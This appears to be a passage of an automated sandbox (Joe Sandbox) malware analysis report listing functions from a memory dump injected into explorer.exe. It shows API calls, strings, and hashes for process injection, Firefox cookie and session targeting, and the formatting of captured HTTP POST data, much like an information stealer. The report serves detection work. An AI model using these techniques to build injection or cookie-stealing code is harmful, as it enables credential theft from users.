                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFind$CloseFirstHeapwsprintf$AllocateAttributesChangeCreateDeleteFolderNextNotificationPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                        • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                        • API String ID: 2390375701-637609321
                        • Opcode ID: 5a8cc03ba78cee8bf037322d96511ed9c1bbd1ab709a41cb244eba17236ce99f
                        • Instruction ID: 8b7114b0f705fc7ec5414cb4d4ea56cd5fc80efabc9146b4a70d71c6424a7a7e
                        • Opcode Fuzzy Hash: 5a8cc03ba78cee8bf037322d96511ed9c1bbd1ab709a41cb244eba17236ce99f
                        • Instruction Fuzzy Hash: 30F0A0A530032233961B336B5C0ED6F596DCFD7B52B0101ECF2069AAD1EE54094353B9
                        Function 00381363 Relevance: 7.5, APIs: 5, Instructions: 39processstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 279 381363-38137f CreateToolhelp32Snapshot 280 3813d1-3813d6 279->280 281 381381-381399 Process32First 279->281 282 3813c6-3813c8 281->282 283 3813ca-3813cb FindCloseChangeNotification 282->283 284 38139b-3813ab lstrcmpiA 282->284 283->280 285 3813b8-3813c0 Process32Next 284->285 286 3813ad-3813b3 call 38133f 284->286 285->282 286->285
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                        • Process32First.KERNEL32(00000000,?), ref: 00381393
                        • lstrcmpiA.KERNEL32(?), ref: 003813A3
                        • Process32Next.KERNEL32(00000000,00000128), ref: 003813C0
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcmpi
                        • String ID:
                        • API String ID: 545148253-0
                        • Opcode ID: 27badec4df403b793cb27f25fe17f3a7ab22c79f9a2496e4951162f239079ea9
                        • Instruction ID: dd7f4af5447128d00ac1342a11b1df5bb43f344db98cfb276f452ce51839b870
                        • Opcode Fuzzy Hash: 27badec4df403b793cb27f25fe17f3a7ab22c79f9a2496e4951162f239079ea9
                        • Instruction Fuzzy Hash: 42F0C8B55013149BD7226B25AC08BDFB7BCEB49321F0101E0F949E2590EBB48D558B51
                        Function 00381235 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 309 381235-381247 OpenFileMappingA 310 381249-381259 MapViewOfFile 309->310 311 38125c-381260 309->311 310->311
                        APIs
                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0038123F
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00383C33), ref: 00381251
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: e561ba3a8f9e219c319b09b2a41a859fe14b5598bdad03e0a989b76cfae1928c
                        • Instruction ID: 7eecba42c209451fc4b7008ee1787cedba192128ea4b299ed8191e17a016a92f
                        • Opcode Fuzzy Hash: e561ba3a8f9e219c319b09b2a41a859fe14b5598bdad03e0a989b76cfae1928c
                        • Instruction Fuzzy Hash: 53D017727053327BE7306ABB6C0CF83AE9DDF86BE1F024065B609D2150D6608811C3F0
                        Function 00381011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 317 381011-38101b call 381274 320 38102d-38102e 317->320 321 38101d-381027 GetProcessHeap RtlFreeHeap 317->321 321->320
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                        • RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Heap$FreeProcessQueryVirtual
                        • String ID:
                        • API String ID: 2580854192-0
                        • Opcode ID: 28e37829eed1df146394ec2ef5ccb1163587008a10ba77ae65890a8b6cae9a3a
                        • Instruction ID: e5ac072a6e50e7f7b4b28c79569f6c02cbe3915ba05d9413e3c68fa0849d2d9f
                        • Opcode Fuzzy Hash: 28e37829eed1df146394ec2ef5ccb1163587008a10ba77ae65890a8b6cae9a3a
                        • Instruction Fuzzy Hash: 9DC08CB200436096CA2237B03C0CBC7AA1C9F09351F050AC1B60496042CAA0880683A0
                        Function 003815A9 Relevance: 3.0, APIs: 2, Instructions: 9fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 322 3815a9-3815bd SetFileAttributesW DeleteFileW
                        APIs
                        • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,0038168B), ref: 003815AF
                        • DeleteFileW.KERNELBASE(00000000), ref: 003815B6
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: File$AttributesDelete
                        • String ID:
                        • API String ID: 2910425767-0
                        • Opcode ID: e312f82b7c571d28c48e7a3061a85bcadf76dd335cbe809afbf8a65eae86f509
                        • Instruction ID: c3d5d4f80337d0dd8441071abda10c6d9821372e9f30ba50a0b57a32297162cf
                        • Opcode Fuzzy Hash: e312f82b7c571d28c48e7a3061a85bcadf76dd335cbe809afbf8a65eae86f509
                        • Instruction Fuzzy Hash: 50B09272002631ABD6122B14BC0DBCF665CEF0A311F150082F301954509B941A0287EA
                        Function 00381000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 323 381000-381010 GetProcessHeap RtlAllocateHeap
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: 350ed13138f111faf5a2e9036239a3fc6bbcfa3c05008eef2837057b061d0491
                        • Instruction ID: b38b6225fc20fe4ba8081313156a4919d7fde2b692b18ace5f4fabb8bf1fe232
                        • Opcode Fuzzy Hash: 350ed13138f111faf5a2e9036239a3fc6bbcfa3c05008eef2837057b061d0491
                        • Instruction Fuzzy Hash: 17A002F55503115BDE4557A4BD0DB17751CB744745F248584734685450A96454148721

                        Non-executed Functions

                        Function 00381FE5 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 0038201A
                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00382055
                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 003820E5
                        • RtlMoveMemory.NTDLL(00000000,003850A0,00000016), ref: 0038210C
                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00382134
                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00382144
                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0038215E
                        • GetLastError.KERNEL32 ref: 00382166
                        • CloseHandle.KERNEL32(00000000), ref: 00382174
                        • Sleep.KERNEL32(000003E8), ref: 0038217B
                        • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00382191
                        • GetProcAddress.KERNEL32(00000000), ref: 00382198
                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003821AE
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003821D8
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003821EB
                        • CloseHandle.KERNEL32(00000000), ref: 003821F2
                        • Sleep.KERNEL32(000001F4), ref: 003821F9
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0038220D
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00382224
                        • CloseHandle.KERNEL32(00000000), ref: 00382231
                        • CloseHandle.KERNEL32(?), ref: 00382237
                        • CloseHandle.KERNEL32(?), ref: 0038223D
                        • CloseHandle.KERNEL32(00000000), ref: 00382240
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                        • String ID: atan$ntdll$opera_shared_counter
                        • API String ID: 1066286714-2737717697
                        • Opcode ID: 2129c80869f93289e1b78718f9aa83b8b939ebfedc1192d278c1f024dd3d7fea
                        • Instruction ID: 97e15fea8af45db6ad780262a3b02264174cb81302df6aa157eb847ee29a29fc
                        • Opcode Fuzzy Hash: 2129c80869f93289e1b78718f9aa83b8b939ebfedc1192d278c1f024dd3d7fea
                        • Instruction Fuzzy Hash: 126191B1608305AFD312EF65CC84E6BBBECEB88754F010699F949D3291D774DD058B62
                        Function 0038118D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 003811A9
                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 003811C1
                        • lstrlen.KERNEL32(?,00000000), ref: 003811C9
                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 003811D4
                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 003811EE
                        • wsprintfA.USER32 ref: 00381205
                        • CryptDestroyHash.ADVAPI32(?), ref: 0038121E
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00381228
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                        • String ID: %02X
                        • API String ID: 3341110664-436463671
                        • Opcode ID: 56490436473f6f92534b09e4ad1d67c9d2cd63aeb51e7807f295bb0ad18bda0b
                        • Instruction ID: c5f4c0e4fff49f834b48578fac95bf98dd0d13c6c3099a89602cade64251fc2a
                        • Opcode Fuzzy Hash: 56490436473f6f92534b09e4ad1d67c9d2cd63aeb51e7807f295bb0ad18bda0b
                        • Instruction Fuzzy Hash: 3F111FB590020DBFDB129FA5EC88EEFBBBCEB44741F1040A5F605E2550E7714E559B60
                        Function 00382E1B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54nativeCOMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00382EC5), ref: 00382E27
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00382E52
                        • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00382E7F
                        • StrStrIW.SHLWAPI(?,NetworkService), ref: 00382E92
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                        • String ID: NetworkService
                        • API String ID: 1656241333-2019834739
                        • Opcode ID: c036433ade85b5a10e6be7a560e6cb6a273abc1e675fe5b7d8c99820c21ea012
                        • Instruction ID: e3bb5b243b4797f5066b66515e7cbac99074c7532f3d3c481cce4ec660da6713
                        • Opcode Fuzzy Hash: c036433ade85b5a10e6be7a560e6cb6a273abc1e675fe5b7d8c99820c21ea012
                        • Instruction Fuzzy Hash: 6A01D4B1300346BFD3267B219C49E6B7A9DEBD8392F0140A9FA4AD6142DAB49C808760
                        Function 00382974 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 157stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                          • Part of subcall function 0038104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00382A16,?,00000001), ref: 00381056
                          • Part of subcall function 0038285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 003828A2
                        • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00382A4A
                        • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00382A6C
                        • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00382A8D
                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00382A96
                        • StrToIntA.SHLWAPI(00000000), ref: 00382AB9
                        • wnsprintfA.SHLWAPI ref: 00382B0D
                        • lstrcat.KERNEL32(00000000,?), ref: 00382B2D
                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 00382B35
                        • lstrcat.KERNEL32(00000000,?), ref: 00382B3C
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                        • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                        • API String ID: 2605944266-950501416
                        • Opcode ID: 48efa5c3ebedde2b9797f18301640505b0bb35f643236e9d9b16389347342e89
                        • Instruction ID: 490330d7d8ceff95e3fa43d6b63624f3a9ddcaf3cc5523361149269ed5e81397
                        • Opcode Fuzzy Hash: 48efa5c3ebedde2b9797f18301640505b0bb35f643236e9d9b16389347342e89
                        • Instruction Fuzzy Hash: D95180706043415FCB1BFF248985A6FBBDAAF88304F0408DDF8859B692DB74DD468766
                        Function 00382FAA Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                        • RtlZeroMemory.NTDLL(?,0000000A), ref: 00382FFA
                        • StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383024
                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383052
                        • wsprintfA.USER32 ref: 003830B9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 003830E5
                        • lstrcat.KERNEL32(?,{:!:}), ref: 003830F8
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,00386038), ref: 00383109
                        • RtlMoveMemory.NTDLL(00000000), ref: 00383112
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                        • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                        • API String ID: 2886538537-1627781280
                        • Opcode ID: 8c8ef4c13eafa12b74e987183af7f99455696477ef6243bf768a48cd124aad1f
                        • Instruction ID: 07cadb73ba00b7c5833f2a3297aa3afcf20b6ada60beba10db6068709c52bfbc
                        • Opcode Fuzzy Hash: 8c8ef4c13eafa12b74e987183af7f99455696477ef6243bf768a48cd124aad1f
                        • Instruction Fuzzy Hash: 3631E2B13043466BD706BB258C5AF6F76AEEBC0B41F0044BCF9028B782DA75D94687A1
                        Function 00383132 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0038322D
                        • wsprintfA.USER32 ref: 0038329E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 003832AF
                        • lstrcat.KERNEL32(00000000,{:!:}), ref: 003832BE
                        • lstrlen.KERNEL32(00000000), ref: 003832C1
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003832D2
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                        • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                        • API String ID: 3430864794-1604029033
                        • Opcode ID: c4d3642fea1c8e0780450c7c8050064b24170977a46bf56d17259d1eef798312
                        • Instruction ID: 7b2d5141ab2b6eb8bc64b9da0d2e29c34e800de9a0ed202f03904dd558713fb6
                        • Opcode Fuzzy Hash: c4d3642fea1c8e0780450c7c8050064b24170977a46bf56d17259d1eef798312
                        • Instruction Fuzzy Hash: DE41C3B1108345AFD312EF10DC49E6FBBECFB88345F00096EF54296251DB749A48CBA6
                        Function 00383449 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 109stringCOMMON
                        Download Yara Rule
                        APIs
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 00383455
                        • lstrcat.KERNEL32 ref: 003834AB
                          • Part of subcall function 00382FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00382FFA
                          • Part of subcall function 00382FAA: StrToIntA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383024
                          • Part of subcall function 00382FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00383347), ref: 00383052
                          • Part of subcall function 00382FAA: wsprintfA.USER32 ref: 003830B9
                          • Part of subcall function 00382FAA: lstrcat.KERNEL32(00000000,00000000), ref: 003830E5
                          • Part of subcall function 00382F1F: CreateThread.KERNEL32(00000000,00000000,00382ED2,?,00000000,00000000), ref: 00382F2F
                          • Part of subcall function 00382F1F: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00382F36
                          • Part of subcall function 0038105D: VirtualFree.KERNEL32(?,00000000,00008000,00382B4B), ref: 00381065
                        • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00383504
                        • StrToIntA.SHLWAPI(?,00000000,?), ref: 0038352B
                        • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0038358D
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 003835C1
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                        • String ID: $Content-Length:$POST
                        • API String ID: 2960674810-114478848
                        • Opcode ID: 6e23e4ab5ccfeef092bd13a73f05124a05493a69a5f0a1d8b2ba6bff8b6ff499
                        • Instruction ID: 4282e6c2cbf48f7a5f42be2cb3064ced81669e34c009174bf86bb3ef7effcf81
                        • Opcode Fuzzy Hash: 6e23e4ab5ccfeef092bd13a73f05124a05493a69a5f0a1d8b2ba6bff8b6ff499
                        • Instruction Fuzzy Hash: 8331C5F16083418BCB03FF64ED6A66A7BADBB85701F0504EDE9029B352DB34890DCB59
                        Function 003816C7 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 003816D9
                        • GetCurrentThreadId.KERNEL32 ref: 003816E1
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003816F1
                        • Thread32First.KERNEL32(00000000,0000001C), ref: 003816FF
                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0038171E
                        • SuspendThread.KERNEL32(00000000), ref: 0038172E
                        • CloseHandle.KERNEL32(00000000), ref: 0038173D
                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0038174D
                        • CloseHandle.KERNEL32(00000000), ref: 00381758
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                        • String ID:
                        • API String ID: 1467098526-0
                        • Opcode ID: 2e575342d2ff2e31b712bab611d092e2b78f8711e3e67719adb10d8e62120c50
                        • Instruction ID: bfc699058687c94dfeebad6b31bd5a89b37c32225844454788614183178f3f21
                        • Opcode Fuzzy Hash: 2e575342d2ff2e31b712bab611d092e2b78f8711e3e67719adb10d8e62120c50
                        • Instruction Fuzzy Hash: 30113CB2408302EBD713AF60AC48A6BBFACEF85705F05049DF68592550D730894A9BA7
                        Function 0038186C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 227COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                          • Part of subcall function 0038106C: lstrlen.KERNEL32(?,?,00000000,00000000,0038189F,74DE8A60,?,00000000), ref: 00381074
                          • Part of subcall function 0038106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00381086
                          • Part of subcall function 003817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 003817EE
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 003818FB
                        • wsprintfW.USER32 ref: 003819F2
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00381AD0
                        Strings
                        • POST, xrefs: 003819A0
                        • Content-Type: application/x-www-form-urlencoded, xrefs: 00381A34
                        • Accept: */*Referer: %S, xrefs: 003819E8
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                        • API String ID: 3833683434-704803497
                        • Opcode ID: 29c3579e5db7978b2c2d3f493804b766e5db91ca1a51850d7bcf85fea59fdb06
                        • Instruction ID: 354b93ae07ca9ea9612e605dda8fe991592b80a029be7bb6e194336ca1adca3e
                        • Opcode Fuzzy Hash: 29c3579e5db7978b2c2d3f493804b766e5db91ca1a51850d7bcf85fea59fdb06
                        • Instruction Fuzzy Hash: 9C8178B1608301AFD716AF68DC88A2BBBEDEB88744F0009ADF545D7251EB34DD46CB52
                        Function 003823E3 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0038104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00382A16,?,00000001), ref: 00381056
                        • lstrcat.KERNEL32(?,00000000), ref: 003825BB
                        • lstrcat.KERNEL32(?,003842A8), ref: 003825C7
                        • lstrcat.KERNEL32(?,?), ref: 003825D6
                        • lstrcat.KERNEL32(?,003842AC), ref: 003825E5
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrcat$AllocVirtual
                        • String ID: :authority$?$dyn_header
                        • API String ID: 3028025275-1785586894
                        • Opcode ID: dfbef1308e70accbe8a799cc4f34606cc4c6cf622edd7ec9b035da6f20b98579
                        • Instruction ID: 517fb9377187727d693ae09e54ff20d09c72de8d4b0d492439134237ce45a148
                        • Opcode Fuzzy Hash: dfbef1308e70accbe8a799cc4f34606cc4c6cf622edd7ec9b035da6f20b98579
                        • Instruction Fuzzy Hash: 8A61F4725083128FC712FF25949066BB7DAABD4310F4509ADF8815B282E7789D0EDB63
                        Function 003828AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                        • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0038291B
                        • lstrcat.KERNEL32(?,003842BC), ref: 0038292A
                        • lstrlen.KERNEL32(?,74DE8A60,00000001,?,?,00000000,?,?,00382B26,?,?,?,?,00000001), ref: 0038295C
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrlen$MemoryMovelstrcat
                        • String ID: cookie
                        • API String ID: 2957667536-1295510418
                        • Opcode ID: bf54d09622cf709df4c692cb51ccac6f269dd584ff6fb870f9a9e007a25f7ed8
                        • Instruction ID: abd6cc16b21dede99186e283de35374d4cbaabd7b500a8a900e8d8795561293a
                        • Opcode Fuzzy Hash: bf54d09622cf709df4c692cb51ccac6f269dd584ff6fb870f9a9e007a25f7ed8
                        • Instruction Fuzzy Hash: 8B1106723083029BC713BF98DC85BABB7E9EB80710F1505ADFD0197641EBB1E90A4391
                        Function 003832F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                        Download Yara Rule
                        APIs
                        • RtlEnterCriticalSection.NTDLL(00386038), ref: 00383332
                        • RtlLeaveCriticalSection.NTDLL(00386038), ref: 00383358
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
